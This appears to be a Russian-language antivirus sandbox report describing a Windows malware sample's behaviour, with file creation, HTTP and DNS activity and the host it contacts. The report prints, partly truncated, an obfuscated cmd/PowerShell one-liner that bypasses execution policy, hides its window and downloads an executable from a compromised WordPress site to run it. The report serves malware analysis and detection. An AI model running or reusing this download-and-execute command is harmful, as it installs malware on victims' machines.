Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://swcol-ltda.com/wp-content/uploads/2015/qotot/hhz9.exe как %appdata%.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /C "p^oW^E^r^sh^eLl^.E^Xe -^eX^ecuTI^on^po^L^ICY ^BY^p^aSs^ -NopR^of^iL^e^ -w^INDows^tYLe HIDD^en (^nEw-^ObJe^c^T ^s^YST^Em.^NET^.^w^EbCliE^nT)^.DoWNL^OADfIle(^'http://swcol-lt...
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%.exe
Сетевая активность
Подключается к
- 'sw###-ltda.com':80
TCP
Запросы HTTP GET
- http://sw###-ltda.com/wp-content/uploads/2015/QOTOT/hHz9.exe
UDP
- DNS ASK sw###-ltda.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /C "p^oW^E^r^sh^eLl^.E^Xe -^eX^ecuTI^on^po^L^ICY ^BY^p^aSs^ -NopR^of^iL^e^ -w^INDows^tYLe HIDD^en (^nEw-^ObJe^c^T ^s^YST^Em.^NET^.^w^EbCliE^nT)^.DoWNL^OADfIle(^'http://swcol-lt...' (со скрытым окном)
